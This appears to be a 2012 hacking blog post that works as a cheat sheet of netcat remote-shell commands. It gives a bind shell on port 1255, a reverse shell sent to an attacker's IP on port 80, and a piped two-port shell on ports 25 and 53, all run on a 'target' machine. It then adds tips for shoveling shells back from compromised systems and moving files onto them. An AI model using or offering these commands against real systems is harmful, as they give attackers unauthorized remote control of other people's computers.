Sunday, 4 March 2012

Netcat Remote Shell Commands


nc -L -d -e c :\winnt\system32\cmd.exe -p 1255 Run onthe listening machine (target), this will send back a Windows command shell when connected on port 1255. The L switch keeps a persistent listener running, and the D switch sets no interactive console. To connect to the target machine you would run: nc target IP address 1255. Remember that netcat must be located in the \system32 of the target machine in order to execute cmd.exe. You may also need to put in the full path to cmd.exe, such as c:\winnt\system32\cmd.exe.

nc attacker IP address 80 -e c:\winnt\system32\cmd.exe (or /usr/bin/bash) Run this on the target machine to have netcat execute a command shell and send the shell out port 80 to the attacking system. The attacking system has netcat listening on ports 80 (nc -v -l -p 80).

nc attacker IP address 25 | cmd.exe | nc attacker IP address 53 (or /bin/bash instead of cmd.exe) Run this on the target machine to have two netcat sessions started for issuing commands and piping the output and executing a command shell to the attacking system. The attacking system should have netcat listening on ports 25 and 53 (nc -v -l -p 25/53). The attacker will issue commands on the port 25 session and receive the output on the port 53 session. Aswith the previous instance, netcat must be in the same directory as cmd.exe. Another twist on this remote shell shoveling theme is to use Telnet instead of netcat in the command example above.

Netcat cheat-sheet (advance hacking with Netcat)                                                                              
----------------------------------------------------
http://h.ackack.net/cheatsheets/netcat 
-----------------------------------------------------
 
Getting a command shell back from a compromised system can be tricky. Remember that you can either connect to the target and have it respond with a shell or execute a command and have the shell “shoveled” back out to you. Also, you have such things as ftp, tftp, and http possibly available on the target that you can make use of in order to get necessary files back to the target. You can also try running the server part of these either on the target or the attacking machine in either a “push” or “pull” fashion. Don’t forget tools such as fpipe, WinRelay, and Zebedee for port forwarding and redirecting, either. Links to those can be found in the last section, “Must-Have Free (or Low-Cost) Tools.”

No comments:

Post a Comment

Note: only a member of this blog may post a comment.